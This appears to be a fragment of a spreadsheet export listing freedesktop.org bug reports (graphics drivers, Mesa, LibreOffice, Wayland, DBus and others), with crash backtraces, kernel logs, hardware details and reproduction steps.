[drm] nouveau 0000:01:00.0: PGRAPH_ERROR - nSource: PROTECTION_ERROR nStatus: INVALID_STATE
[drm] nouveau 0000:01:00.0: PGRAPH_ERROR - Ch 1/0 Class 0x0039 Mthd 0x0184 Data 0x000011ce:0x000011ce
My system:
$ X -version
X.Org X Server 1.7.1
Release Date: 2009-10-23
X Protocol Version 11 Revision 0
Build Operating System:  2.6.18-164.2.1.el5 
Current Operating System: Linux sedan 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
Kernel command line: ro root=LABEL=/ rhgb quiet SYSFONT=latarcyrheb-sun16 LANG=en_GB.UTF-8 KEYTABLE=pl2
Build Date: 05 November 2009  07:43:20PM
Build ID: xorg-x11-server 1.7.1-7.fc12 
Current version of pixman: 0.16.2
	Before reporting problems check http://bodhi.fedoraproject.org/
	to make sure that you have the latest version.
The card:
01:00.0 VGA compatible controller: nVidia Corporation NV18GL [Quadro NVS 280 SD] (rev a2) (prog-if 00 [VGA controller])
	Subsystem: nVidia Corporation Device 0190
	Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Interrupt: pin A routed to IRQ 11
	Region 0: Memory at fc000000 (32-bit non-prefetchable) [size=16M]
	Region 1: Memory at f0000000 (32-bit prefetchable) [size=128M]
	Expansion ROM at fd000000 [disabled] [size=128K]
	Capabilities: 
	Kernel modules: nouveau nvidiafb
As you see lspci claims it's NV18-base card while the driver says:
[drm] nouveau 0000:01:00.0: Detected an NV17 generation card (0x018a00a3)
Any other data I can provide?</t>
  </si>
  <si>
    <t>DRI-78248</t>
  </si>
  <si>
    <t>[BDW GT3 Bisected]igt/gem_render_copy costs long time to execute</t>
  </si>
  <si>
    <t>Created attachment 98410
dmesg
*System Environment:
--------------------------
Platform: BDW GT3
kernel: 
-nightly: 08ce6614d07dd1e426109672a5e323317c8d6ec7(fails)
-queued: e5c03ca362819ba8ffbe5674340b61b9cd75de8f (fails)
-fixes: 9bbfd20abe5025adbb0ac75160bd2e41158a9e83 (works)
 *Bug detailed description:
-----------------------------
igt/gem_render_copy costs long time to execute the test unable to finish in 15 minutes.
It's first time to run this case on GT3
Output:
./gem_render_copy
IGT-Version: 1.6-gc1404e0 (x86_64) (Linux: 3.14.0_drm-intel-next-queued_e5c03c_20140504+ x86_64)
 *Reproduce steps:
---------------------------- 
1. ./gem_render_copy</t>
  </si>
  <si>
    <t>TELEPATHY-52441</t>
  </si>
  <si>
    <t>Race when preparing blocked contacts</t>
  </si>
  <si>
    <t>Original bug: https://bugzilla.gnome.org/show_bug.cgi?id=679825#c7
tp-glib tries to prepare blocked contact while the CONNECTED feature is not prepared yet raising a warning.
(empathy:4339): tp-glib-CRITICAL **: tp_connection_upgrade_contacts: assertion
`tp_proxy_is_prepared (self TP_CONNECTION_FEATURE_CONNECTED)' failed
Program received signal SIGTRAP Trace/breakpoint trap.
0x00007ffff56d3e29 in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
(gdb) bt
#0  0x00007ffff56d3e29 in g_logv () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#1  0x00007ffff56d3fc2 in g_log () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#2  0x00007ffff7152daa in tp_connection_upgrade_contacts (
    self=self@entry=0x7bf750 n_contacts=n_contacts@entry=4 
    contacts=contacts@entry=0xc6aad0 n_features=n_features@entry=16 
    features= 
    callback=callback@entry=0x7ffff714d490  
    user_data=0xc6c2e0 destroy=0x415190  
    weak_object=weak_object@entry=0x0) at contact.c:4311
#3  0x00007ffff7152eb1 in tp_connection_upgrade_contacts_async (
    self=self@entry=0x7bf750 n_contacts=n_contacts@entry=4 
    contacts=contacts@entry=0xc6aad0 n_features=16 features= 
    callback=callback@entry=0x7ffff71a4280  
    user_data=user_data@entry=0xc6c550) at contact.c:4761
#4  0x00007ffff71a5aab in tp_simple_client_factory_upgrade_contacts_async (
    self= connection=0x7bf750 n_contacts=4 
    contacts=0xc6aad0 callback= user_data=)
    at simple-client-factory.c:924
#5  0x00007ffff714787e in process_queued_blocked_changed (self=0x7bf750)
    at connection-contact-list.c:1784
#6  0x00007ffff71258b3 in _tp_cli_connection_interface_contact_blocking_invoke_callback_request_blocked_contacts (weak_object= 
    user_data= 
---Type  to continue or q  to quit---
    generic_callback=0x7ffff71479d0  
    args=0xc81ac0 error=0x0 self=0x7bf750)
    at _gen/tp-cli-connection-body.h:7963
#7  _tp_cli_connection_interface_contact_blocking_invoke_callback_request_blocked_contacts (self=0x7bf750 error=0x0 args=0xc81ac0 
    generic_callback=0x7ffff71479d0  
    user_data= weak_object=)
    at _gen/tp-cli-connection-body.h:7946
#8  0x00007ffff71a0c90 in tp_proxy_pending_call_idle_invoke (p=0xc1bd20)
    at proxy-methods.c:155
#9  0x00007ffff56ccc65 in g_main_context_dispatch ()
   from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#10 0x00007ffff56ccf98 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#11 0x00007ffff56cd054 in g_main_context_iteration ()
   from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#12 0x00007ffff5c6c72c in g_application_run ()
   from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#13 0x0000000000415d50 in main (argc=1 argv=0x7fffffffe258) at empathy.c:847</t>
  </si>
  <si>
    <t>FONTCONFIG-22037</t>
  </si>
  <si>
    <t>No Fonts installed on a default install on Windows Server 2003</t>
  </si>
  <si>
    <t>I have a basic install of Windows Server 2003 32 bit and I am trying to use the text tool.  I am using the GIMP 2.6.6.  This is a basic install of Windows Server 2003 and the default install of GIMP 2.6.6  I am not sure what is causing the issue but I have an idea that it is a configuration issue probably with fontconfig and windows server.  When I try to use the font tool there are no fonts listed and when I try to use it I get a message letting me know that there are no fonts installed.</t>
  </si>
  <si>
    <t>jcrossdaboss</t>
  </si>
  <si>
    <t>LIBREOFFICE-47299</t>
  </si>
  <si>
    <t>CALC: Escalating when re-calculating a huge number of crosslinked cell functions (EDITING FILEOPEN FILESAVE)</t>
  </si>
  <si>
    <t>Created attachment 58421
Zip archive with 4 files for the decribed testing scenario
In the case a CALC document consists of a huge number of cells which contain sheetwise cross-linked cell functions LibO's runtime seems to escalate and leads to extremely slow performance and/or freezing/blocking of the GUI for many seconds or minutes.
The effect concerns LOADING DOC RECALCULATING on cell change event and SAVING DOC.
It looks in such a way as if at any time ALL cells are computed instead of recalculating/refreshing only the changed and depending cells.
It also slightly remembers old BUG 40650 but directly 43804 and 47106. 
The given example will IMHO reproduce the effects.
Test conditions of the following benchmark data:
OS:  Windows Xp Pro SP3
CPU: Intel Core i5-2410M 2.30 GHz
RAM: 3 GB
COMPARED APPLICATIONS: OpenOffice 3.3.0 Excel97 and LibO.
Effects reproduced with LibO 3.4.3 3.4.5 3.5.0RC3 LOdev3.5.2RC-nightlyBuild20120312 on WindowsXpSP3 
AND LibO 3.5.0RC3 on Windows7Pro-64bit
Test:
Step 1: download zip and extract files
Step 2: try File 1 with OpenOffice
Step 3: extract File 2 and try xls with Excel97 or OpenOffice
Step 4: open File 1 with LibO
Step 5: change to sheet Ansicht and edit cell Y9 with Value 50 as displayed in screenshots Files 3 and 4
Benchmarks:
LibO 3.5.0/ods
OPEN        376 s = 6 min 16 s
CALCULATE    30 s
SAVE        257 s = 4 min 17 s
(OPEN with 355 s remaining at progress bar message Adapt row height/ZeilenhÃ¶he anpassen)
Excel97/xls: 
OPEN         5 s
CALCULATE   &lt;1 s
SAVE         3 s
OOo 3.3.0/ods
OPEN        37 s
CALCULATE    5 s
SAVE        17 s
(OPEN with 25 s remaining at progress bar message Adapt row height/ZeilenhÃ¶he anpassen)
Attachment: test-escalation-at-cross-linked-cell-functions.zip
contains
File 1: linked_tabs-many_formulas.ods 
A simple stock management document migrated from xls to ods using many cross-linked table formulas e.g.
english:
a) =IF($A9=VLOOKUP(CA9$Plan.BI$1:BL$1001COLUMN(D6)0))
b)=IF(SUMIF($CQ9:$CU9AA$2$CL9:$CP9)=00SUMIF($CQ9:$CU9AA$2$CL9:$CP9))
c) =IF(A9=IF(SUM(CW9-$Plan.$J$2)&lt;-1000 no Arr !!CW9-$Plan.$J$2))
german:
a) =WENN($A9=SVERWEIS(CA9$Plan.BI$1:BL$1001SPALTE(D6)0))
b) =WENN(SUMMEWENN($CQ9:$CU9AA$2$CL9:$CP9)=00SUMMEWENN($CQ9:$CU9AA$2$CL9:$CP9))
c) =WENN(A9=WENN(SUMME(CW9-$Plan.$J$2)&lt;-1000 no Arr !!CW9-$Plan.$J$2))
File 2: linked_tabs-many_formulas-export.xls
is a conversion from ods to xls
File 3: before_edit_cell_Y9.jpg
screenshot before doing the test
File 4: after_edit_cell_Y9_to_value_50.jpg
screenshot after having done the test</t>
  </si>
  <si>
    <t>klauspeter.schmitt</t>
  </si>
  <si>
    <t>UIM-19877</t>
  </si>
  <si>
    <t>Segfaults in libqt-mt.3.3.8 when Qt3 and Qt4 support both enabled</t>
  </si>
  <si>
    <t>Building UIM with support for both Qt3 and Qt4 causes persistent segmentation faults at runtime across Qt4-based applications when Qt4 is built with qt3support enabled (I haven't tested with qt3 support disabled as it's currently a dependency of KDE4).
The messages in my syslog all take similar form to:
Feb  1 09:12:53 Yue [211765.301509] kded4[23399]: segfault at 100000340 ip 00007f280e1f2928 sp 00007fff1f8d6590 error 4 in libqt-mt.so.3.3.8[7f280dc47000+79c000]
Reinstalling UIM with either qt3 or qt4 disabled immediately allows running of these apps again.</t>
  </si>
  <si>
    <t>epp.8</t>
  </si>
  <si>
    <t>XORG-39576</t>
  </si>
  <si>
    <t>Radeon driver problems with HD 6850 card in HP HPE 8 (Ubuntu 11.04 and Fedora 15)</t>
  </si>
  <si>
    <t>X windows freezes. Sometimes the screen goes blank and then returns repeatedly with the monitor indicating loss of video signal. The system works to some extent but doing something as simple as dragging the scrollbar up and down in Firefox ends up making the system completely unresponsive. The message GPU lockup CP stall for more than 10000msec is logged. glxgears runs for a second or two but screen then is drawn with random pixels and system locks up. The same behavior occurs with Ubuntu 11.04 and Fedora 15. The Catalyst driver (11.6) does not have the problem except fgl_glxgears produces a very jerky rendering of the gears and the window takes  a second or two to even get painted (tried this on Ubuntu only).
Example from /var/log/messages:
Jul 25 14:11:19 funky kernel: [   28.625730] radeon 0000:01:00.0: GPU lockup CP stall for more than 10000msec
Jul 25 14:11:19 funky kernel: [   28.625735] ------------[ cut here ]------------
Jul 25 14:11:19 funky kernel: [   28.625764] WARNING: at drivers/gpu/drm/radeon/radeon_fence.c:269 radeon_fence_wait+0x2a8/0x325 [radeon]()
Jul 25 14:11:19 funky kernel: [   28.625767] Hardware name: h8-1070t
Jul 25 14:11:19 funky kernel: [   28.625769] GPU lockup (waiting for 0x0000008D last fence id 0x00000089)
Jul 25 14:11:19 funky kernel: [   28.625771] Modules linked in: 8021q garp stp llc cpufreq_ondemand acpi_cpufreq freq_table mperf sco bnep l2cap bluetooth rfkill ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 ip6table_filter ip6_tables snd_hda_codec_hdmi snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_hwdep snd_seq snd_seq_device snd_pcm microcode joydev iTCO_wdt serio_raw i2c_i801 iTCO_vendor_support snd_timer snd r8169 xhci_hcd soundcore snd_page_alloc mii ipv6 usb_storage uas radeon ttm drm_kms_helper drm i2c_algo_bit i2c_core [last unloaded: scsi_wait_scan]
Jul 25 14:11:19 funky kernel: [   28.625809] Pid: 1181 comm: Xorg Not tainted 2.6.38.8-35.fc15.x86_64 #1
Jul 25 14:11:19 funky kernel: [   28.625812] Call Trace:
Jul 25 14:11:19 funky kernel: [   28.625820]  [] warn_slowpath_common+0x83/0x9b
Jul 25 14:11:19 funky kernel: [   28.625824]  [] warn_slowpath_fmt+0x46/0x48
Jul 25 14:11:19 funky kernel: [   28.625850]  [] ? evergreen_gpu_is_lockup+0xba/0xc2 [radeon]
Jul 25 14:11:19 funky kernel: [   28.625870]  [] radeon_fence_wait+0x2a8/0x325 [radeon]
Jul 25 14:11:19 funky kernel: [   28.625875]  [] ? autoremove_wake_function+0x0/0x3d
Jul 25 14:11:19 funky kernel: [   28.625893]  [] radeon_sync_obj_wait+0x11/0x13 [radeon]
Jul 25 14:11:19 funky kernel: [   28.625901]  [] ttm_bo_wait+0xbf/0x17a [ttm]
Jul 25 14:11:19 funky kernel: [   28.625908]  [] ? ttm_bo_list_ref_sub+0x29/0x2b [ttm]
Jul 25 14:11:19 funky kernel: [   28.625931]  [] radeon_bo_wait+0x7b/0x9f [radeon]
Jul 25 14:11:19 funky kernel: [   28.625953]  [] radeon_gem_wait_idle_ioctl+0x3d/0x74 [radeon]
Jul 25 14:11:19 funky kernel: [   28.625964]  [] drm_ioctl+0x29e/0x37b [drm]
Jul 25 14:11:19 funky kernel: [   28.625969]  [] ? inode_has_perm+0x76/0x8c
Jul 25 14:11:19 funky kernel: [   28.625990]  [] ? radeon_gem_wait_idle_ioctl+0x0/0x74 [radeon]
Jul 25 14:11:19 funky kernel: [   28.625996]  [] ? _cond_resched+0xe/0x22
Jul 25 14:11:19 funky kernel: [   28.626001]  [] ? should_resched+0xe/0x2d
Jul 25 14:11:19 funky kernel: [   28.626005]  [] ? should_resched+0xe/0x2d
Jul 25 14:11:19 funky kernel: [   28.626009]  [] ? file_has_perm+0xa4/0xc6
Jul 25 14:11:19 funky kernel: [   28.626013]  [] do_vfs_ioctl+0x47e/0x4bf
Jul 25 14:11:19 funky kernel: [   28.626018]  [] ? audit_syscall_exit+0x12d/0x148
Jul 25 14:11:19 funky kernel: [   28.626021]  [] sys_ioctl+0x56/0x7b
Jul 25 14:11:19 funky kernel: [   28.626026]  [] ? int_check_syscall_exit_work+0x34/0x3d
Jul 25 14:11:19 funky kernel: [   28.626030]  [] system_call_fastpath+0x16/0x1b
Jul 25 14:11:19 funky kernel: [   28.626033] ---[ end trace e3b1afa8f60cb0a1 ]---
Jul 25 14:11:19 funky kernel: [   28.627143] radeon 0000:01:00.0: GPU softreset
Jul 25 14:11:19 funky kernel: [   28.627147] radeon 0000:01:00.0:   GRBM_STATUS=0xF5701828
Jul 25 14:11:19 funky kernel: [   28.627150] radeon 0000:01:00.0:   GRBM_STATUS_SE0=0xFC000003
Jul 25 14:11:19 funky kernel: [   28.627152] radeon 0000:01:00.0:   GRBM_STATUS_SE1=0x00000003
Jul 25 14:11:19 funky kernel: [   28.627155] radeon 0000:01:00.0:   SRBM_STATUS=0x200006C0
Jul 25 14:11:20 funky kernel: [   28.781777] radeon 0000:01:00.0: Wait for MC idle timedout !
Jul 25 14:11:20 funky kernel: [   28.781781] radeon 0000:01:00.0:   GRBM_SOFT_RESET=0x00007F6B
Jul 25 14:11:20 funky kernel: [   28.781885] radeon 0000:01:00.0:   GRBM_STATUS=0x00003828
Jul 25 14:11:20 funky kernel: [   28.781888] radeon 0000:01:00.0:   GRBM_STATUS_SE0=0x00000007
Jul 25 14:11:20 funky kernel: [   28.781891] radeon 0000:01:00.0:   GRBM_STATUS_SE1=0x00000007
Jul 25 14:11:20 funky kernel: [   28.781893] radeon 0000:01:00.0:   SRBM_STATUS=0x200006C0
Jul 25 14:11:20 funky kernel: [   28.782897] radeon 0000:01:00.0: GPU reset succeed
Jul 25 14:11:20 funky kernel: [   28.990212] radeon 0000:01:00.0: Wait for MC idle timedout !
Jul 25 14:11:20 funky kernel: [   29.174553] radeon 0000:01:00.0: Wait for MC idle timedout !
Jul 25 14:11:20 funky kernel: [   29.176759] radeon 0000:01:00.0: WB enabled
Jul 25 14:11:20 funky kernel: [   29.193106] [drm] ring test succeeded in 2 usecs
Jul 25 14:11:20 funky kernel: [   29.193120] [drm] ib test succeeded in 3 usecs</t>
  </si>
  <si>
    <t>MESA-55811</t>
  </si>
  <si>
    <t>Build failure: nv50_ir_print.cpp:395:7: error: expected â€˜)â€™ before â€˜PRIx64â€™</t>
  </si>
  <si>
    <t>Including the latest commit:  7cb8764ca39cb7f325d6da10a8b11bf24adf2ae0
Fixed by reverting commit 30ebc8650caa8f67deebaae397 .
Haven't narrowed down where the previous problem (beginning with cb72ec5fc55651af186e45942a1cd3e45eb5c359) ends and this one begins.
Full output:
http://www.chaosreigns.com/wayland/tmp/2012-10-09-12-30/mesa-configure.log
http://www.chaosreigns.com/wayland/tmp/2012-10-09-12-30/mesa-make.log
Building with: ./autogen.sh --prefix=$installdir --enable-gles2 --disable-gallium-egl --with-egl-platforms=waylandx11drm --enable-gbm --enable-shared-glapi --with-gallium-drivers=r300r600swrastnouveausvga
$ gcc --version
gcc (Ubuntu/Linaro 4.6.1-9ubuntu3) 4.6.1</t>
  </si>
  <si>
    <t>MESA-3452</t>
  </si>
  <si>
    <t>Drivers/DRI/SiS</t>
  </si>
  <si>
    <t>DRI Acceleration not working</t>
  </si>
  <si>
    <t>I have an ECS DeskNote A907 portable computer with SiS 305 graphics card. I have
enabled DRI with mode 0666 in my xorg.conf but when I try to launch an OpenGL
application the X server hangs with blank screen and the keyboard is not
responding (well it responds only to kernel Magic SysRq hotkeys). I am also
using SiS framebuffer which (according to the kernel documentation) should not
be needed. Therefore I have also tried to run OpenGL applications with disabled
framebuffer but in this case they refuse to start.
If you need more information please tell me and I will see what I can do.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-27825</t>
  </si>
  <si>
    <t>Enhancement to hu keymap</t>
  </si>
  <si>
    <t>Created attachment 35272
patch to symbols/hu
Hungarian ortography rules require the usage of â€ž and â€ quotation marks and the n-dash (â€“) character. Currently it is hard to input these characters. In current hu keymap AltGr+z in qwertz layout and AltGr+y in qwerty layout are undefined AltGr+o is Ã¸ and AltGr+p is Ã¾. The characters Ã¸ and Ã¾ are not used in Hungarian.
The attached patch adds â€ž â€ and â€“ to the hu layout.</t>
  </si>
  <si>
    <t>LIBREOFFICE-60804</t>
  </si>
  <si>
    <t>Print to File leads to Crash</t>
  </si>
  <si>
    <t>1. Open component (spreadsheet for instance)
2. Go to File -&gt; Print
3. Click on options tab
4. Check print to file
5. Click on Print to file button at bottom
Result - CRASH
Expected - No crash save dialog comes up for pdf creation
Makes triage work quite difficult without this option. 
Regression since 4.0.0.3 release</t>
  </si>
  <si>
    <t>MESA-97286</t>
  </si>
  <si>
    <t>`make check` fails uniform-initializer-test</t>
  </si>
  <si>
    <t>Introduced in series ending with:
mesa 30e5ff706789823145c51313870c87bffab6943f
Author:     Timothy Arceri 
glsl: remove remaining tabs in link_uniform_initializers.cpp</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-15978</t>
  </si>
  <si>
    <t>GPG key</t>
  </si>
  <si>
    <t>Created attachment 16591
GPG key
Please add the attached GPG key to my account (zack iirc).</t>
  </si>
  <si>
    <t>zackr</t>
  </si>
  <si>
    <t>DBUS-22581</t>
  </si>
  <si>
    <t>configure fails for gcc-3.4.6</t>
  </si>
  <si>
    <t>Created attachment 27297
test if -Wno-pointer-sign is accepted
I found it quite unfriendly that the configure script unconditionally adds the  gcc warning flag -Wno-pointer-sign without testing if this flag is accepted by gcc.
This flag is not accepted by gcc-3.4.6 it is accepted by gcc-4.2.4 (and probably as well by 4.0 4.1).
This is particularly sad since the configure script already contains a shell function making that kind of test extremely simple.</t>
  </si>
  <si>
    <t>SPICE-55726</t>
  </si>
  <si>
    <t>spice-server wrongly disconnects client</t>
  </si>
  <si>
    <t>When the agent inside the guest goes away (crash or whatever) then the client will get notified of this but the client may try to send agent data between the agent going away and the client processing this message. Currently when we hit this race spice-server prints: ERROR: channel refused to allocate buffer. and then proceeds to disconnects the client. This is clearly wrong behavior. Better behavior would be for the server to drop the message (possibly with a warning) and let the client stick around.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-99320</t>
  </si>
  <si>
    <t>symbols/de: use rightsinglequotemark on BKSL in all variants</t>
  </si>
  <si>
    <t>Created attachment 128813
patch.
The small fix/addition due to Bug #19934 (https://bugs.freedesktop.org/show_bug.cgi?id=19934#c8) was incomplete and did add rightsinglequotemark to the basic variant only.
The attached patches propagate the change to the remaining variants where I think it is useful (leaving Dvorak alone).</t>
  </si>
  <si>
    <t>stefan.tauner</t>
  </si>
  <si>
    <t>DRI-29278</t>
  </si>
  <si>
    <t>[Arrandale] failure to disable FDI for CPU eDP causes blank screen</t>
  </si>
  <si>
    <t>Created attachment 37419
intel_reg_dumper - nonworking
i compiled and ran the latest kernel 2.6.35-rc6+ from Tue 27 Jul 2010 21:32:59 commit fc0f5ac8fe693d1b05f5a928cc48135d1c8b7f2e and despite this version should incorporate the fixes for bug#28224 which i submitted and was marked as a duplicate of bug#28070 which is marked fixed i now have the exact same problem as in the bug i reported (bug#28224).
the effect is the same as described in the mentioned bugreports - once the i915 module is loaded the screen goes black.
comparing the intel_reg_dumper output for my problem now shows the same difference in eDP values as the intel_reg_dumper outputs i attached to old bug#28224 and that's why i guessed that this is (again) an eDP error but of course i might be wrong - intel_reg_dumper output is attached.
hardware is again dell e6510 as in bug#28224.</t>
  </si>
  <si>
    <t>j.schauer</t>
  </si>
  <si>
    <t>XORG-11979</t>
  </si>
  <si>
    <t>xf86-videpo-intel from git + 965GM: segfault</t>
  </si>
  <si>
    <t>Using the latest git checkout of xf86-video-intel xorg segfaults here at startup
setup:
lspci -v:
00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) (prog-if 00 [VGA])
        Subsystem: Dell Unknown device 01fe
        Flags: bus master fast devsel latency 0 IRQ 11
        Memory at fea00000 (64-bit non-prefetchable) [size=1M]
        Memory at e0000000 (64-bit prefetchable) [size=256M]
        I/O ports at eff8 [size=8]
        Capabilities: [90] Message Signalled Interrupts: 64bit- Queue=0/0 Enable-
        Capabilities: [d0] Power Management version 3
00:02.1 Display controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c)
        Subsystem: Dell Unknown device 01fe
        Flags: bus master fast devsel latency 0
        Memory at feb00000 (64-bit non-prefetchable) [size=1M]
        Capabilities: [d0] Power Management version 3
xorg libs from git (2007-08-13)
xorg server from git (2007-08-13)
Mesa from git (2007-08-13)
drm from git (2007-08-13)</t>
  </si>
  <si>
    <t>XORG-54134</t>
  </si>
  <si>
    <t>Asserting hit when resizing FF &gt; 8k px [SNA Gen6]</t>
  </si>
  <si>
    <t>When resizing a FF-Window with gmail loaded to &gt;8k px I hit the following assertion on my Gen6 based Notebook:
0x00000034f2635925 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64	  return INLINE_SYSCALL (tgkill 3 pid selftid sig)
(gdb) bt
#0  0x00000034f2635925 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00000034f26370d8 in __GI_abort () at abort.c:91
#2  0x00000034f262e6a2 in __assert_fail_base (fmt=0x34f2778188 %s%s%s:%u: %s%sAssertion `%s' failed.\n%n 
    assertion=assertion@entry=0x7fbbf38604d8 !too_large(op-&gt;dst.width op-&gt;dst.height) 
    file=file@entry=0x7fbbf38603f5 gen6_render.c line=line@entry=684 
    function=function@entry=0x7fbbf3862090 gen6_emit_drawing_rectangle) at assert.c:94
#3  0x00000034f262e752 in __GI___assert_fail (assertion=0x7fbbf38604d8 !too_large(op-&gt;dst.width op-&gt;dst.height) 
    file=0x7fbbf38603f5 gen6_render.c line=684 function=0x7fbbf3862090 gen6_emit_drawing_rectangle)
    at assert.c:103
#4  0x00007fbbf37ea301 in gen6_emit_drawing_rectangle (sna=0x7fbbf3459010 op=0x7fff69015730) at gen6_render.c:684
#5  0x00007fbbf37ea990 in gen6_emit_state (sna=0x7fbbf3459010 op=0x7fff69015730 wm_binding_table=65520)
    at gen6_render.c:901
#6  0x00007fbbf37f39b6 in gen6_emit_fill_state (sna=0x7fbbf3459010 op=0x7fff69015730) at gen6_render.c:3635
#7  0x00007fbbf37f3f6e in gen6_render_fill_boxes (sna=0x7fbbf3459010 op=3 '\003' format=537004168 color=0x12b57e8 
    dst=0x12a4ed0 dst_bo=0x1281740 box=0x7fff69015940 n=1) at gen6_render.c:3740
#8  0x00007fbbf37737f3 in sna_composite_rectangles (op=3 '\003' dst=0x127b160 color=0x12b57e8 num_rects=1 
    rects=0x12b57f0) at sna_composite.c:861
#9  0x00000000004fb135 in ?? ()
#10 0x000000000043444a in ?? ()
#11 0x0000000000423485 in ?? ()
#12 0x00000034f2621735 in __libc_start_main (main=0x423110 argc=8 ubp_av=0x7fff69015bc8 init= 
    fini= rtld_fini= stack_end=0x7fff69015bb8) at libc-start.c:226
#13 0x000000000042375d in _start ()</t>
  </si>
  <si>
    <t>MESA-99246</t>
  </si>
  <si>
    <t>[d3dadapter+radeonsi &amp; bisect] EVE-Online : hang on wormhole sight</t>
  </si>
  <si>
    <t xml:space="preserve">Latest Mesa update from git since then EVE-Online (wine+nine) hang on sight of a wormhole and a kill is required to exit it.
I bisected and it's that commit : 7089d88199d607d8a135a9605f14ec6393134205
Author: Axel Davy 
Date:   Sun Dec 4 01:10:34 2016 +0100
    st/nine: Bind destination for surface/volume uploads
    Will enable to use the bind count as an information for
    whether the surface/volume is used in the worker thread.
    Signed-off-by: Axel Davy </t>
  </si>
  <si>
    <t>b747xx</t>
  </si>
  <si>
    <t>GEOCLUE-93383</t>
  </si>
  <si>
    <t>Demo apps</t>
  </si>
  <si>
    <t>buttons are of different shape</t>
  </si>
  <si>
    <t>tester.spright</t>
  </si>
  <si>
    <t>MESA-28191</t>
  </si>
  <si>
    <t>Mesa completly misdisplays composite WM</t>
  </si>
  <si>
    <t>Mesa from git (55b5806e364836c62ac5eb0b6230abb43369e3c1 6f77b751b6577c72fdbf7cb6c8eef4bc87c360cc) misdisplays the composite WM. I.e.:
- Windows are black
- Text is unreadable</t>
  </si>
  <si>
    <t>XORG-14839</t>
  </si>
  <si>
    <t>xorg/lib/libAppleWM - ansification</t>
  </si>
  <si>
    <t>Created attachment 14868
0001-Ansify-libAppleWM.patch
Special attention may be required here due to functions with arguments
of type short.
  proto/applewmproto/applewm.h already declares ansi prototypes with
short arguments so theoretically this patch should be correct but
there may exist problems (probably not at least with gcc as the
functions had a prototype).</t>
  </si>
  <si>
    <t>PIGLIT-36664</t>
  </si>
  <si>
    <t>CMake Error OPENGL_egl_LIBRARY NOTFOUND</t>
  </si>
  <si>
    <t>piglit: aee9bc2891fcfbbf5a7799439bcba99a77fb39e5 (master)
$ cd piglit
$ cmake .
CMake Error: The following variables are used in this project but they are set to NOTFOUND.
Please set them or make sure they are set and tested correctly in the CMake files:
OPENGL_egl_LIBRARY
    linked by target hiz-depth-test-fbo-d24 in directory piglit/tests/hiz
    linked by target hiz-depth-test-fbo-d24-s8 in directory piglit/tests/hiz
    linked by target hiz-depth-test-fbo-d24s8 in directory piglit/tests/hiz
    linked by target hiz-depth-test-window-stencil0 in directory piglit/tests/hiz
    linked by target hiz-depth-test-window-stencil1 in directory piglit/tests/hiz</t>
  </si>
  <si>
    <t>GEOCLUE-27342</t>
  </si>
  <si>
    <t>update .gitignore</t>
  </si>
  <si>
    <t>Created attachment 34504
patch v1
Hi when cloning repository and building geoclue git status show a lot of untracked files they should probably be added to .gitignore</t>
  </si>
  <si>
    <t>WAYLAND-97813</t>
  </si>
  <si>
    <t>slow mouse movement on bluetooth mouse (but not when connected over USB)</t>
  </si>
  <si>
    <t>I own a ThinkPad X1 Wireless Touch Mouse (http://shop.lenovo.com/us/en/itemdetails/4X30K40903/460/0E80436C80A748E6AA76791FC42C9CA3)
  connected through bluetooth
the mouse movement on screen is really slow compared to the physical distance.</t>
  </si>
  <si>
    <t>codronm+circlecode</t>
  </si>
  <si>
    <t>POPPLER-7904</t>
  </si>
  <si>
    <t>crash in SplashXPathScanner::SplashXPathScanner()</t>
  </si>
  <si>
    <t>bug opened here: http://bugzilla.gnome.org/show_bug.cgi?id=351267
#3  
No symbol table info available.
#4  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb7112861 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
No locals.
#6  0xb7114009 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
No locals.
#7  0xb71485bb in __libc_message () from /lib/tls/i686/cmov/libc.so.6
No locals.
#8  0xb71cd871 in __stack_chk_fail () from /lib/tls/i686/cmov/libc.so.6
No locals.
#9  0xb6e70e3c in SplashXPathScanner::SplashXPathScanner ()
   from /usr/lib/libpoppler.so.1
No symbol table info available.
#10 0xb6e27d18 in StreamPredictor::getNextLine ()
   from /usr/lib/libpoppler.so.1</t>
  </si>
  <si>
    <t>WAYLAND-80594</t>
  </si>
  <si>
    <t>event loop test fails from time to time</t>
  </si>
  <si>
    <t>Hi
it's very rare event I noticed it by accident so I tried this:
  $ while ./event-loop-test do  done
Sometimes it takes time but the result is:
test event_loop_destroy:      exit status 0 pass.
lt-event-loop-test: tests/event-loop-test.c:258: event_loop_timer_updates: Assertion `context.count == 2' failed.
test event_loop_timer_updates:        signal 6 fail.
test event_loop_timer:        exit status 0 pass.
test event_loop_signal:       exit status 0 pass.
test event_loop_free_source_with_data:        exit status 0 pass.
test event_loop_post_dispatch_check:  exit status 0 pass.
6 tests 5 pass 1 fail
I tried it on fedora and arch linux master branch of wayland.
Regards
Marek Chalupa</t>
  </si>
  <si>
    <t>DBUS-66481</t>
  </si>
  <si>
    <t>[PATCH] DBus Spec: fix sample service file</t>
  </si>
  <si>
    <t>Figure 9. Example service description file
            # Sample service description file
            [D-BUS Service]
